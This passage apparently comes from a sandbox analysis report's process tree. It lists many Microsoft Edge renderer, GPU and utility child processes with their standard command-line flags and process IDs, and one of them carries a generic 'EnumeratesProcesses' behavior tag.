  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
  2⤵
  PID:3688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1
  2⤵
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
  2⤵
  PID:6040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
  2⤵
  PID:5208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1
  2⤵
  PID:1460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:1
  2⤵
  PID:3668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:5796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8568 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9156 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8500 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:2332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7968 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8892 /prefetch:1
  2⤵
  PID:5560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8936 /prefetch:1
  2⤵
  PID:5920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9184 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9460 /prefetch:1
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:1
  2⤵
  PID:2432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9736 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8028 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10224 /prefetch:1
  2⤵
  PID:2308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10360 /prefetch:1
  2⤵
  PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10604 /prefetch:1
  2⤵
  PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8752 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10868 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10916 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11308 /prefetch:1
  2⤵
  PID:1168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11320 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11504 /prefetch:1
  2⤵
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11688 /prefetch:1
  2⤵
  PID:3980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9116 /prefetch:1
  2⤵
  PID:6484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11656 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9176 /prefetch:1
  2⤵
  PID:6416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
  2⤵
  PID:6220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9000 /prefetch:1
  2⤵
  PID:7004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10640 /prefetch:1
  2⤵
  PID:7040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
  2⤵
  PID:6648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
  2⤵
  PID:6748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:6980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:6284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:1
  2⤵
  PID:1992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11452 /prefetch:1
  2⤵
  PID:1780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12180 /prefetch:1
  2⤵
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6892 /prefetch:8
  2⤵
  PID:1056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
  2⤵
  PID:6640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7244 /prefetch:8
  2⤵
  PID:6644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11824 /prefetch:1
  2⤵
  PID:6252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10476 /prefetch:8
  2⤵
  PID:5436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11944 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10632 /prefetch:1
  2⤵
  PID:5444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7860 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11932 /prefetch:1
  2⤵
  PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8668 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8912 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12236 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
